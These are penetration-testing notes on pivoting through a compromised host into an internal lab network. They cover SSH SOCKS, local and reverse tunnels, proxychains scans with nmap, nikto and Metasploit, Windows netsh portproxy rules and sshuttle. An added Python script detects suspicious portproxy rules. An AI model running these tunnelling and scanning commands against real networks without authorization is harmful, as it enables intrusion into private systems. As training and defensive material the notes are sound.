Pivoting Notes

Pivoting

If you can SSH into the compromised server, you can use SSH Dynamic Port Forwarding (SOCKS proxy) or
SSH Local Port Forwarding to reach and scan hosts on the internal network. Before we start, you need to know the lab configuration:

Attacker Machine/Your Machine – (10.11.0.X) – Kali O/S
Compromised_Host/Pivot_Host (The host you are going to use as a proxy machine) – 10.11.1.X (Public interface)/ 10.1.1.X (IT Network interface) – Windows O/S
Target Machine – (10.1.1.X)

=== SSH Dynamic Port Forwarding (Socks proxy) ===

In Attacker’s Machine (Kali)

root@kali:#ssh -D address:port -f -N username@pivot_host
root@kali:#ssh -D 127.0.0.1:8080 -f -N administrator@10.11.1.X
administrator@10.11.1.X's password:

(KEEP THIS TERMINAL OPEN)

>>> Scanning the ports with nmap <<<

root@kali:#proxychains nmap -Pn -sV -sT --unprivileged 10.1.1.X

(proxychains can only relay full TCP connections, so use a connect scan (-sT) and skip ICMP host discovery (-Pn).)

>>> Scanning web vulnerabilities using nikto <<<

root@kali:#proxychains nikto -host 10.1.1.X

>>> Using MSF <<<

root@kali:#proxychains msfconsole

=== SSH Local Port Forwarding ===

root@kali:#ssh -L attackerPort:targetMachineIP:targetMachinePort username@pivot_host
root@kali:#ssh -L 80:10.1.1.X:80 administrator@10.11.1.X

(KEEP THIS TERMINAL OPEN)

>>> Scanning port 80 with nmap <<<

root@kali:#nmap -Pn -sV -sT -p 80 localhost

>>> Scanning web vulnerabilities using nikto <<<

root@kali:#nikto -h 10.1.1.X -useproxy http://127.0.0.1:80/
(OR)
root@kali:#nikto -h 127.0.0.1

>>> Scanning port 80 with MSF <<<

msf > use auxiliary/scanner/http/http_version
msf auxiliary(http_version) > set RHOSTS 127.0.0.1
msf auxiliary(http_version) > set RPORT 80
msf auxiliary(http_version) > run

=== SSH Native Windows Port Forwarding (Must be Administrator) ===

(Inside the Compromised_Host/Pivot_Host)

C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport=listenPort listenaddress=pivot_host_PublicInterfaceIP connectport=targetMachinePort connectaddress=targetMachineIP
C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport=8888 listenaddress=10.11.1.X connectport=80 connectaddress=10.1.1.X

(The listener must be bound to the interface the attacker machine can reach, i.e. the pivot's public 10.11.1.X address; binding it to the 10.1.1.X IT-network interface would not be reachable from Kali.)

>>> Scanning web vulnerabilities using nikto <<<

root@kali:#nikto -h pivot_Host:8888
root@kali:#nikto -h 10.11.1.X:8888

## Pivoting alternative?

sshuttle -r user@10.11.1.252 10.X.X.0/24

Proxychains

## On popped host
$ ssh -f -N -R 2222:127.0.0.1:22 root@10.11.0.201

## On Kali
$ ssh -f -N -D 127.0.0.1:8080 -p 2222 firefart@127.0.0.1
$ proxychains nmap --top-ports=20 -sT -Pn 10.1.1.0/24

Reference: https://ibarramario94.gitbooks.io/oscp/content/oscp/pivoting.html
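The netsh portproxy rules above survive reboots (they are persisted under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp), so a defender reviewing a Windows host wants to enumerate them. The following is an added example, not part of the original notes: it parses the output of `netsh interface portproxy show all` (a constructed sample in the lab's address ranges) and flags rules that expose hosts on a given internal network through the pivot.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample of `netsh interface portproxy show all` output taken
# on the pivot host. Addresses are placeholders in the lab's ranges.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.11.1.5       8888        10.1.1.20       80
0.0.0.0         3390        10.1.1.21       3389
"""

# One data row: listen address, listen port, connect address, connect port.
# Header and separator lines never match because their second field is
# not numeric.
ROW = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(text):
    """Return (listen_addr, listen_port, connect_addr, connect_port) tuples."""
    rules = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        la, lp, ca, cp = m.groups()
        try:
            ip_address(la)
            ip_address(ca)
        except ValueError:
            continue  # hostnames are allowed by netsh but out of scope here
        rules.append((la, int(lp), ca, int(cp)))
    return rules


def suspicious_rules(rules, internal_net):
    """Rules whose connect address lies inside internal_net (e.g. 10.1.1.0/24).

    Any such rule lets whoever can reach the listen address talk to an
    internal host through this machine; on a host that is not a sanctioned
    gateway every hit should be investigated.
    """
    net = ip_network(internal_net)
    return [r for r in rules if ip_address(r[2]) in net]


if __name__ == "__main__":
    for la, lp, ca, cp in suspicious_rules(parse_portproxy(SAMPLE_OUTPUT), "10.1.1.0/24"):
        print(f"portproxy {la}:{lp} -> {ca}:{cp} exposes an IT-network host")
```

On a live host, feed the script the real output (`netsh interface portproxy show all > portproxy.txt`) and pass your own internal prefix to `suspicious_rules`.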

Author: McPeters Joseph

Joseph McPeters is a Security Researcher. He specializes in network and web application penetration testing. Contact: admin@incidentsecurity.com
